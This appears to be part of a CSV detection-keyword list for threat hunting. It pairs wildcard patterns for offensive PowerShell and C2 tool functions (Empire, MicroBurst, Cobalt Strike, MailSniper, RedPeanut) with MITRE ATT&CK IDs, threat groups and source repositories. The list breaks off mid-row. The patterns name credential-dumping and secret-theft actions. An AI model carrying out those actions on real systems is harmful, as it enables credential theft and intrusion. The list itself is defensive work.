+"*Get-AppLockerPolicy -Effective *","greyware_tool_keyword","powershell","AppLocker Get AppLocker policy","T1592","TA0043","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Get-ASREPHash*","offensive_tool_keyword","AD exploitation cheat sheet","AS-REP roasting Get the hash for a roastable user using ASREPRoast.ps1","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Get-AzAutomationAccountCredsREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Get-AzDomainInfo*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation 
tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Get-AzDomainInfoREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Get-AzKeyVaultKeysREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Get-AzKeyVaultSecretsREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Get-AzPasswords*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Get-AZStorageKeysREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Get-AzureADDomainInfo*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - 
T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Get-AzureADDomainInfo.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Get-AzurePasswords*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Get-AzUserAssignedIdentity*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Get-BaseLineResponseTimeEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z"
+"*Get-BeaconAPI*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z"
+"*GetBearerToken.exe https://*.sharepoint.com*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z"
+"*Get-BloodHoundData*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SPN.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Get-BootKey*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Get-BrowserData.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1153","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Get-BrowserInformation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*GetC2Server*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*Get-CachedGPPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Get-CachedRDPConnection*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
+"*Get-CachedRDPConnection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*getcap -r / 2>*","greyware_tool_keyword","getcap","recursively scans all the files starting from the root directory / and lists files with capabilities set","T1082 - T1007","TA0007 - TA0009","N/A","N/A","discovery","N/A","1","0","N/A","6","8","N/A","N/A","N/A","N/A"
+"*getcap -r / 2>/dev/null*","greyware_tool_keyword","Getcap","Enumerating File Capabilities with Getcap","T1046 - T1083","TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
+"*Get-ChromeBookmarks*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ChromeDump*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ChromeDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1150","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ChromeHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*GetChromeSecrets*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*GETCLIPBOARD*GETLOCALGROUP*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Get-ClipboardContents*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
+"*Get-ClipboardContents.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1070","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-CompressedAgent*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
